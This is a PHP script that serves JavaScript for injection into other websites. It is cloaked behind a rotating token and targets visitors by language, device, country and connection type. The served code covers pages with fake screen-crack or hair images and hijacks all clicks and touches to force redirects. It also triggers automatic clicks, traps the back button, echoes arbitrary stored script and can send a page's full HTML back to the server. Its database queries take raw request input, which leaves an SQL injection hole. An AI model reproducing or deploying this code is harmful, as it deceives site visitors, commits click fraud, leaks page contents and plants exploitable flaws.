<?php

require("config.php");
require("Mobile_Detect.php");
require("geoip2/vendor/autoload.php");
use GeoIp2\Database\Reader;

$notFound = false;

if(isset($_GET["v"]))
{
    $v = $_GET["v"];
    $secretKey = "pelo";
    $secretKeyAddMin = 13;
    $minutes = 3;

    $minArr = array();
    $d = new DateTime(null, new DateTimeZone("UTC"));
    $ds = clone $d;
    $ds->modify("+$secretKeyAddMin minutes");
    array_push($minArr, md5($d->format("YmdHi").$secretKey.$ds->format("FDli")));
    $db = clone $d;
    $dbs = clone $d;
    $dbs->modify("+$secretKeyAddMin minutes");
    for($i = 0; $i < $minutes; $i++)
        array_push($minArr, md5($db->modify("-1 minutes")->format("YmdHi").$secretKey.$dbs->modify("-1 minutes")->format("FDli")));
    $da = clone $d;
    $das = clone $d;
    $das->modify("+$secretKeyAddMin minutes");
    for($i = 0; $i < $minutes; $i++)
        array_push($minArr, md5($da->modify("+1 minutes")->format("YmdHi").$secretKey.$das->modify("+1 minutes")->format("FDli")));

    if(!in_array($v, $minArr))
        $notFound = true;
}
else
{
    $notFound = true;
}

if($notFound)
{
    header("HTTP/1.0 404 Not Found");
    exit;
}

$baseUrl = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"];

$code = $_GET["code"];

$db = new mysqli($db_host, $db_user, $db_pwd, $db_name);

$res = $db->query("SELECT * FROM sites WHERE enabled = 1 AND code = '$code'");

if($res && $obj = $res->fetch_object())
{
    $ip = $_SERVER['REMOTE_ADDR'];

    if($obj->image_type == "script" && $ip == "82.62.130.48")
        return;

    $show = true;

    if(!isset($_GET["force_show"]))
    {
        $res = $db->query("SELECT * FROM clicks WHERE site_id = $obj->id AND ip = '".$ip."' AND HOUR(TIMEDIFF(NOW(), date)) < 48");
        if(mysqli_num_rows($res) > 0)
            return;
    }

    $fieldsNoStatistics = array();

    if($obj->browser_langs != null)
    {
        $browser_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
        if(!in_array($browser_lang, explode(',', $obj->browser_langs)))
        {
            $show = false;
            array_push($fieldsNoStatistics, "no_lang");
        }
    }
    
    if($obj->devices != null)
    {
        $md = new Mobile_Detect();
        if($md->isMobile())
            $device = "Mobile";
        else if($md->isTablet())
            $device = "Tablet";
        else
            $device = "Desktop";
        if(!in_array($device, explode(',', $obj->devices)))
        {
            $show = false;
            array_push($fieldsNoStatistics, "no_device");
        }
    }
    
    if($obj->countries != null)
    {
        $reader = new Reader("./mmdb/GeoIP2-Country.mmdb");
        $r = null;
        try
        {
            $r = $reader->country($ip);
        }
        catch(Exception $ex) { }

        if($r != null && !in_array(strtolower($r->country->isoCode), explode(',', $obj->countries)))
        {
            $show = false;
            array_push($fieldsNoStatistics, "no_country");
        }
    }

    if($obj->connection_types != null)
    {
        $reader = new Reader("./mmdb/GeoIP2-Connection-Type.mmdb");
        $r = null;
        try
        {
            $r = $reader->connectionType($ip);
        }
        catch(Exception $ex) { }

        if($r != null && !in_array($r->connectionType, explode(',', $obj->connection_types)))
        {
            $show = false;
            array_push($fieldsNoStatistics, "no_connectiontype");
        }
    }

    if($obj->max_clicks != null)
    {
        if($obj->clicks >= $obj->max_clicks)
            $show = false;
    }

    if($obj->times_range_to_exclude != null)
    {
        foreach(explode(',', $obj->times_range_to_exclude) as $tr)
        {
            $tr_arr = explode('-', $tr);
            date_default_timezone_set("Europe/Rome");
            $from = date("H:i", strtotime($tr_arr[0]));
            $to = date("H:i", strtotime($tr_arr[1]));
            $now = date("H:i");
            if($now >= $from && $now <= $to)
            {
                $show = false;
                array_push($fieldsNoStatistics, "no_timerange");
            }
        }
    }

    $position = explode(',', $obj->position);

    ?>
    $.ajax({
        method: "GET",
        url: "<?=$baseUrl?>/call.php?site_id=<?=$obj->id?>&url=" + encodeURI(document.location),
        async: true
    });
    <?php
    
    if(count($fieldsNoStatistics) > 0)
        UpdateNoStatistics($db, $obj->id, $fieldsNoStatistics);

    if($show || isset($_GET["force_show"]))
    {
        ?>

        var url;

        <?php if($obj->transparent) { ?>
        var timeoutCount = 1;
        
        function SetTransparentLink() {
            var ok = false;

            var div = $("#hosCont");
            if(div.length > 0) {
                var a = div.find("a").first();
                if(a.length > 0) {
                    var a1 = document.createElement("a");
                    url = a.attr("href");
                    a1.setAttribute("href", url);
                    a1.innerHTML = "<img src='<?=$baseUrl?>/images/<?=$obj->image_type?>.png' class='hosImg' style='position: fixed; width: 40px; cursor: default; top: <?=$position[0]?><?=!substr($position[0], -1) == '%' ? "px" : ""?>; left: <?=$position[1]?><?=!substr($position[1], -1) == '%' ? "px" : ""?>' />";
                    a.after(a1);
                    ok = true;
                }
            }

            if(!ok && timeoutCount <= 5) {
                setTimeout(function(){ SetTransparentLink(); }, timeoutCount * 200);
                timeoutCount++;
            }
        }

        function SetTransparentBackground() {
            var ok = false;

            var div = $("#hosCont");
            if(div.length > 0) {
                var a = div.find("a").first();
                if(a.length > 0) {
                    url = a.attr("href");
                    $(document).click(function(event) {
                        return HosClick(url);
                    });
                    document.ontouchmove = function(e) {
                        return HosClick(url);
                    };
                    var div = document.createElement("div");
                    div.className = "hosImg";
                    div.style.position = "fixed";
                    div.style.width = "100%";
                    div.style.height = "100%";
                    div.style.background = "url('<?=$baseUrl?>/images/<?=$obj->image_type?>.png') center no-repeat";
                    div.style.zIndex = "20000";
                    div.style.cursor = "pointer";
                    $("body").prepend(div);
                    ok = true;
                }
            }

            if(!ok && timeoutCount <= 5) {
                setTimeout(function(){ SetTransparentBackground(); }, timeoutCount * 200);
                timeoutCount++;
            }
        }
        <?php } ?>

        $(document).ready(function() {
            <?php if($obj->image_type == "hair") { ?>
            <?php if($obj->transparent) { ?>
            setTimeout(function(){ SetTransparentLink(); }, 500);
            <?php }else{ ?>
            var a = $("a#hosLink");
            if(a.length > 0) {
                url = a.attr("href");
                a.attr("target", "_blank");
                a.attr("onclick", "return HosClick('" + url + "')");
                a.attr("ontouchmove", "return HosClick('" + url + "')");
                a.html("<img src='<?=$baseUrl?>/images/<?=$obj->image_type?>.png' class='hosImg' style='position: fixed; width: 40px; cursor: default; top: <?=$position[0]?><?=!substr($position[0], -1) == '%' ? "px" : ""?>; left: <?=$position[1]?><?=!substr($position[1], -1) == '%' ? "px" : ""?>' />");
            }
            <?php } ?>
            <?php }else if($obj->image_type == "crack" || $obj->image_type == "line") { ?>
            <?php if($obj->transparent) { ?>
            setTimeout(function(){ SetTransparentBackground(); }, 500);
            <?php }else{ ?>
            var a = $("a#hosLink");
            url = a.attr("href");
            $(document).click(function(event) {
                return HosClick(url);
            });
            document.ontouchmove = function(e) {
                return HosClick(url);
            };
            var div = document.createElement("div");
            div.className = "hosImg";
            div.style.position = "fixed";
            div.style.width = "100%";
            div.style.height = "100%";
            div.style.background = "url('<?=$baseUrl?>/images/<?=$obj->image_type?>.png') center no-repeat";
            div.style.zIndex = "20000";
            div.style.cursor = "pointer";
            $("body").prepend(div);
            <?php } ?>
            <?php } ?>
            
            <?php
            if($obj->autoclick_perc > 0)
            {
                $n = rand(0, 100);
                if($n <= $obj->autoclick_perc)
                {
                    ?>
                    setTimeout(function(){ HosClick(url); }, <?=$obj->duration_from != null && $obj->duration_to != null ? rand($obj->duration_from, $obj->duration_to) : rand(3, 6)?>000);
                    <?php
                }
            }
            ?>
        });

        <?php 
        if($obj->image_type == "script") {
            if($obj->id == 39)
            {
                $res = $db->query("SELECT * FROM views WHERE site_id = $obj->id AND ip = '".$ip."' AND HOUR(TIMEDIFF(NOW(), date)) < 48");
                if(mysqli_num_rows($res) > 0)
                    return;
            }
            
            if($obj->script_hours_validity != null && !isset($_GET["force_show"]))
            {
                $res = $db->query("SELECT * FROM views WHERE site_id = $obj->id AND ip = '".$ip."' AND HOUR(TIMEDIFF(NOW(), date)) < $obj->script_hours_validity");
                if(mysqli_num_rows($res) == 0)
                    echo $obj->script;
            }
            else
            {
                echo $obj->script;
            }
        }
        ?>

        <?php
            /*$res = $db->query("SELECT * FROM views WHERE site_id = $obj->id AND html IS NOT NULL");
            $num_html_saved = mysqli_num_rows($res);
            $save_html = $obj->num_html_to_save - $num_html_saved > 0;*/
        ?>
        
        $.ajax({
            method: "POST",
            url: "<?=$baseUrl?>/view.php",
            data: {
                site_id: <?=$obj->id?>,
                url: encodeURI(document.location)
                <?php if($save_html) { ?>
                ,html: document.documentElement.outerHTML
                <?php } ?>
            },
            async: true
        });

        function HosClick(url) {
            $.ajax({
                method: "GET",
                url: "<?=$baseUrl?>/click.php?site_id=<?=$obj->id?>&url=" + encodeURI(document.location),
                async: true
            });
            
            $("a#hosLink").remove();
            document.location = url;

            return false;
        }

        var perfEntries = performance.getEntriesByType("navigation");
        if (perfEntries[0].type === "back_forward") {
            location.reload(true);
        }
        
        <?php

        if($obj->autoclick_perc == null && $obj->duration_from != null && $obj->duration_to != null)
        {
            $duration = rand($obj->duration_from, $obj->duration_to);
            ?>
            setTimeout(function(){
                var el = $("<?php if($obj->image_type == "hair") echo "#hosLink"; else echo ".hosImg"; ?>");
                el.remove();
            }, <?php echo $duration ?>000);
            <?php
        }
    }
}

$db->close();

function UpdateNoStatistics ($db, $site_id, $fields)
{
    $today = date("Y-m-d");

    $res = $db->query("SELECT * FROM calls WHERE site_id = $site_id AND ip = '".$_SERVER['REMOTE_ADDR']."' AND HOUR(TIMEDIFF(NOW(), date)) < 48");
    if(mysqli_num_rows($res) == 0)
    {
        $res = $db->query("SELECT * FROM sites_statistics WHERE site_id = $site_id AND date = '".$today."'");
        if(mysqli_num_rows($res) == 0)
        {
            $query = "INSERT INTO sites_statistics(date, site_id";
            foreach($fields as $f)
                $query .= ", ".$f;
            $query .= ") VALUES('".$today."', $site_id";
            foreach($fields as $f)
                $query .= ", 1";
            $query .= ")";
        }
        else
        {
            $query = "UPDATE sites_statistics SET ";
            $fq = "";
            foreach($fields as $f)
            {
                if(!empty($fq))
                    $fq .= ", ";
                $fq .= "$f = $f + 1";
            }
            $query .= "$fq WHERE date = '".$today."' AND site_id = $site_id";
        }

        $db->query($query);
    }
}

?>